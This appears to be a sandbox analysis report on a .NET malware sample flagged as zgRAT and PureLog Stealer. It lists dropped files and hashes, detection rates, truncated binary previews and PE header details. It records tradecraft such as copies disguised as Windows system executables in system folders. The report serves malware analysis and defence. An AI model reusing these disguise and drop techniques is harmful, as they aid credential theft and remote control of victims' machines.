                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                C:\Users\user\Desktop\zpwiWXhy.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):50176
                                                                Entropy (8bit):5.723168999026349
                                                                Encrypted:false
                                                                SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                MD5:2E116FC64103D0F0CF47890FD571561E
                                                                SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                C:\Windows\Branding\shellbrd\7b23a8b4123990

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with very long lines (553), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):553
                                                                Entropy (8bit):5.874215070804066
                                                                Encrypted:false
                                                                SSDEEP:12:PLp2f+mNDkbvo3w7TLmox9t2lY2lf1JS7lBff9zBk:jS+BvoA7ma4Y2lf1cR9Y
                                                                MD5:05F56B12FFE0C5BE556ECB7F52A67180
                                                                SHA1:3615435D537FF8CDCCE0572BC53A1D4276F22091
                                                                SHA-256:B8787463341BC305584578ECBFB4E39EEBCD223B6C1D8004533A7EBABDA952F4
                                                                SHA-512:F12E760FC39E5D34A92D65AF050C9D610D138E55F083FDF0FF57F3F9B1BCCA41157ECD928262F5302CC2D59D9F1A5A2A6D66A27FCB65D35A7E9E652F1AB0C9AA
                                                                Malicious:false
                                                                Preview:GnX59uSxk7kQgHUSywmlJGmIRa0ibLQFB70LAYOIHl99KFpPjh8T5jYABPoj4tWZqfOiRIRZieeiGm7Muk83M7Jcj0KvupOXOkTp0G7aQivbE03YRbyTudMsVv9b8go2QHTgTRVonimoLsYt6vdS14nvXkTFGfbt43K6gXE9GJpM0ihnXQfNCVAVehIt8QiHG3tShbMiqeMsPa5yDqs0AOri2zc8OVB0kiF7yOF5D6giJSGDmTpRirG1LLZs9NTUcVHqU89ylwxEsIYktZW4ptS2bOvnyW5zmLFxKZsnT1qv4CJCwz9k0ZpsDOPGNW9O17bgDlZTqtkyDh7YEs09XV8NgWu5Kla71b47kn9LZp3Hy0pfR0CefA1f8OAq0eJFSn7mmAxaspjrc0ZprPoTi5b0jY8WnTV5gyyK3C2QDlwzbJDIzU8l00gXLGCNBbxZUoLoCOvoWXQ6IlZaV0gSUuEpRb8xAoOlyXfw8YGkiTOckjOjrm2L4eEkjfWkP8orIoIvGmb6u6uAfmFrMYFXwDqTT5NdCfUkphT5bddFK

                                                                C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3554304
                                                                Entropy (8bit):7.287632240829175
                                                                Encrypted:false
                                                                SSDEEP:98304:coqPT1rMFQMDUQU4ALqWEbtgktkwVl9vg:coqL1QFQMWDLQG2lm
                                                                MD5:76802A2F25A771332D8C00EE56975818
                                                                SHA1:2FA3D8E0A7D3285DA7894C68983FCFF150714559
                                                                SHA-256:C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
                                                                SHA-512:2BE48524833A7B8FD9D0DE7C8197DD57193AC058DE219148089624BD909D82D5277A16D934520AAEF695D0F7E67CFC8FEC284CDFA6EDCBE6C55D1056351A738A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F'.g.................46.........NS6.. ...`6...@.. ........................6...........@..................................S6.K....`6. .....................6...................................................... ............... ..H............text...T36.. ...46................. ..`.rsrc... ....`6......66.............@....reloc........6......:6.............@..B................0S6.....H...........................p+..R6......................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{b...9....& ....8........0.......... ........8........E....k...........?...........8f...~....(Q... .... .... ....s....~....(U....... ........8........~....(Y...~....(]... ....?9... ....8x...8*... ....~....{....9_...& ....8T...r...ps....z*~....9.... ....~....{....:*...& ....8.....

                                                                C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:false
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                C:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:MSVC .res
                                                                Category:dropped
                                                                Size (bytes):1224
                                                                Entropy (8bit):4.435108676655666
                                                                Encrypted:false
                                                                SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                Malicious:false
                                                                Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                C:\Windows\System32\SecurityHealthSystray.exe

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.9660785052414567
                                                                Encrypted:false
                                                                SSDEEP:48:6hpIaPt32M7Jt8Bs3FJsdcV4MKe27uqdI2uvqBHyOulajfqXSfbNtm:RaPVPc+Vx9MuN2uvkccjRzNt
                                                                MD5:3CD1A9E0FFA07D514C63EA7A97674BF0
                                                                SHA1:7B9140506CF9524545A8D8886D5DE63AF6D9D9A4
                                                                SHA-256:8DA1F9232292F5918B2D5E0F90E4D609B256DD460EFD7907DB93E4AF2E95BB01
                                                                SHA-512:B6A8B181AD302E3BA1FE1E65061117FF45B3C00FDADB042F202EE5EEEF87EBEB4349833A5E3254B7B09D0A7D54ADE78EB3EBDEE8FD60485A59FBB120FF2A47D5
                                                                Malicious:true
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...St.g.............................'... ...@....@.. ....................................@.................................h'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..@.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID... ... ...#Blob...........WU........%3................................................................

                                                                C:\Windows\assembly\GAC_32\System.Data.OracleClient\55b276f4edf653

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):209
                                                                Entropy (8bit):5.707894482521909
                                                                Encrypted:false
                                                                SSDEEP:6:rUQG3EQ9VHmY1f4dd1o3O9JqhM50ndeHbiG2RBAj0UI:TK9Vd1fAhMM2dybiG2su
                                                                MD5:F88EAC0D53C3127039092757F3C4AFD6
                                                                SHA1:79CF415D2127675672050953D267FBDBBEC7B23A
                                                                SHA-256:71D5877BABFDE546413353550B03F275E7A9780F4D475D10484E9E7964A87A41
                                                                SHA-512:8C3DE88BD967843493A83A4139EBCD40C768E810C20C01B4CF7895DAED3B048FC455F223098A38237E7BB3AE570C7575D4FC20DB572E85627033C853823587A7
                                                                Malicious:false
                                                                Preview:LIoM1RJ6k8mqJmcbzjrYp6fkOWM4V419XKdpIWvhg9dUW4Lasf0dcRgOmD7eFPlpHnT9IxTdxJ1qdLOULvLzEXgGnOCEYRcQYyMslMR4MXpSZ0vaznSTDvltGNV4uOEgqkRo8gt9eRnrsOqxclPv8JNnMdmX0XJ7SJlyiGcS4TzwH3A2gicJ9TihXobe4VJHHqZjm2OVJ61oUafTc

                                                                C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3554304
                                                                Entropy (8bit):7.287632240829175
                                                                Encrypted:false
                                                                SSDEEP:98304:coqPT1rMFQMDUQU4ALqWEbtgktkwVl9vg:coqL1QFQMWDLQG2lm
                                                                MD5:76802A2F25A771332D8C00EE56975818
                                                                SHA1:2FA3D8E0A7D3285DA7894C68983FCFF150714559
                                                                SHA-256:C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
                                                                SHA-512:2BE48524833A7B8FD9D0DE7C8197DD57193AC058DE219148089624BD909D82D5277A16D934520AAEF695D0F7E67CFC8FEC284CDFA6EDCBE6C55D1056351A738A
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F'.g.................46.........NS6.. ...`6...@.. ........................6...........@..................................S6.K....`6. .....................6...................................................... ............... ..H............text...T36.. ...46................. ..`.rsrc... ....`6......66.............@....reloc........6......:6.............@..B................0S6.....H...........................p+..R6......................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{b...9....& ....8........0.......... ........8........E....k...........?...........8f...~....(Q... .... .... ....s....~....(U....... ........8........~....(Y...~....(]... ....?9... ....8x...8*... ....~....{....9_...& ....8T...r...ps....z*~....9.... ....~....{....:*...& ....8.....

                                                                C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                C:\Windows\bcastdvr\7b23a8b4123990

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with very long lines (901), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):901
                                                                Entropy (8bit):5.908402485925322
                                                                Encrypted:false
                                                                SSDEEP:24:sAHqCc/jBAm5ookQWRuSOh9xD+i9pxRuXAH1pcJA3jbER/thHJ:sUO9X5CluXh9YgRSq1pzEzhp
                                                                MD5:FBF03E7D8D5A34CE54E004CFF72CE291
                                                                SHA1:4BC83676B5A3A186F99DEC043A18AADDA152D84C
                                                                SHA-256:7E213A4D1F082826FCABE39FA3A97973FDF798DC962A32C811AEC6BF830DC1DF
                                                                SHA-512:3831A8CB1694A632F0D414645CC4DDD9061C050FC358B674408FFE5F2EC963858FA1A5532EEE096BD9437FA2E964F38D1059B5BC6FA2AB167414D25DA7A1DAAE
                                                                Malicious:false
                                                                Preview:o7YiKspbebQnTG9Cc3N7JICKd1MGsa8hcVqLhSemuDzAdO7yB5gq1cug5OESfjsDdsK8axfJZkMFTBrP4YFx3Rq9kKQTOMGLVvhuD9XNZWRQQpM4hyXHe5KLCLYQhM5MeBuid6M5A1Xh9at57WvZy8rZlVs1kHqNbFvO5oakmcHmhnMlbcSKagXfUU7IOUU2LKG4oeAS6LxV1E28JGaIyfx4rP4krRVRIPaXgR66cAOOtCoPb99H4MDqWLMZkZkozfNlofb1JdpyQiKpkpJsSNW6LuAVFhWDZkYNzCk6hI8bgPZxAhy5P2VmJQa4fFwlGmYqK70iENKKP4a5UMUhtaxhOwEimqbcWWU41tnDrQ1CrLWO0ejSvO2pz0bX2R5Ywsy3jgEliQ0dju0Da0sHGIrHeoEARQLaUcQ8XdoUZ8ueYYGEAY7CiyRnBqZ5bEURFZJGe1p7LYrHYNsFiAA2TI1fLm7qEt2VncY8P9kIsA0KGJPy7TWaDc87in51392cfWd6yu0ja1JTRrYBXJsuWcRLdbalDsOtHYoupS9NdwAMTpp0O4duRIFDEScXTPgrmZM3CoVEKeRkbF2ywjWJPec8TlqX0l4NQTj3dvxkiZkw1fl8Zolt2XbI7Nkb78OikDUHg9VAwvk04pHy9r7M9KV21b5PLWmkKCMyKdcaTl7GwlORGwcQACiZrbQFDFzaJAp2dTnfOh3YNOFPMnJY3WjIdxGtNXWNwh7w6WywJ7BdJJLdVA2Z5agwahYqN3R1KpmqQTT0zWP6VG9TlmYNf7RVALWZ7IjPpJSdhfMBqBkjKjbThEEkeEVNYQpF742qw9RLxfwFaWgdWsLbtC12D9vkyFFQ0GEvI3wKSPfCS9KHh10pFOV4D9mxOqXsZfOTSuVd5

                                                                C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3554304
                                                                Entropy (8bit):7.287632240829175
                                                                Encrypted:false
                                                                SSDEEP:98304:coqPT1rMFQMDUQU4ALqWEbtgktkwVl9vg:coqL1QFQMWDLQG2lm
                                                                MD5:76802A2F25A771332D8C00EE56975818
                                                                SHA1:2FA3D8E0A7D3285DA7894C68983FCFF150714559
                                                                SHA-256:C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
                                                                SHA-512:2BE48524833A7B8FD9D0DE7C8197DD57193AC058DE219148089624BD909D82D5277A16D934520AAEF695D0F7E67CFC8FEC284CDFA6EDCBE6C55D1056351A738A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F'.g.................46.........NS6.. ...`6...@.. ........................6...........@..................................S6.K....`6. .....................6...................................................... ............... ..H............text...T36.. ...46................. ..`.rsrc... ....`6......66.............@....reloc........6......:6.............@..B................0S6.....H...........................p+..R6......................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{b...9....& ....8........0.......... ........8........E....k...........?...........8f...~....(Q... .... .... ....s....~....(U....... ........8........~....(Y...~....(]... ....?9... ....8x...8*... ....~....{....9_...& ....8T...r...ps....z*~....9.... ....~....{....:*...& ....8.....

                                                                C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:false
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                \Device\Null

                                                                Download File
                                                                Process:C:\Windows\System32\w32tm.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):151
                                                                Entropy (8bit):4.774016350637301
                                                                Encrypted:false
                                                                SSDEEP:3:VLV993J+miJWEoJ8FXtXz5U4ig4uEKvr1rZ8XKvj:Vx993DEUO+4b4PL8
                                                                MD5:3282763D94158ADDEC158A15B40204AD
                                                                SHA1:73BD8793DA5B113AC26774ADAFE3D516ECB6585A
                                                                SHA-256:6A5DFFD3CA96C8742A91DDB0E429D35272E435A0CE2B3309ECBC802DFDEE9D07
                                                                SHA-512:88E939C224D228CA025DD9AE260656FB3ACE6DBC9479D8B750916AD2B355B04A999BF0FA12102AD7B70BD424763DA06CED03EC98A973D0DB836144C1D1B938E1
                                                                Malicious:false
                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 10/10/2024 20:41:57..20:41:57, error: 0x80072746.20:42:02, error: 0x80072746.

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.287632240829175
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:lv961v43L3.exe
                                                                File size:3'554'304 bytes
                                                                MD5:76802a2f25a771332d8c00ee56975818
                                                                SHA1:2fa3d8e0a7d3285da7894c68983fcff150714559
                                                                SHA256:c877d0b38b1a395b38ff44494ea2d5e6f826c751503ae8c3d90e3afa9d6ff348
                                                                SHA512:2be48524833a7b8fd9d0de7c8197dd57193ac058de219148089624bd909d82d5277a16d934520aaef695d0f7e67cfc8fec284cdfa6edcbe6c55d1056351a738a
                                                                SSDEEP:98304:coqPT1rMFQMDUQU4ALqWEbtgktkwVl9vg:coqL1QFQMWDLQG2lm
                                                                TLSH:59F5C00296578E35C0F58B336743AC3EB0091265211AF6C73A1B4BF3AB875FD4D994EA
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F'.g.................46.........NS6.. ...`6...@.. ........................6...........@................................

                                                                File Icon

                                                                Icon Hash:00928e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x76534e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x67012746 [Sat Oct 5 11:47:18 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3653000x4b.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3660000x320.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3680000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x3633540x363400c4a5bcd401c19d8b321d1ce0e99f85ceunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x3660000x3200x400f3bac836dd42b490ebbb24d5e58f706eFalse0.3515625data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .reloc0x3680000xc0x2000496f7543202d470b69f6d09caab56f7False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
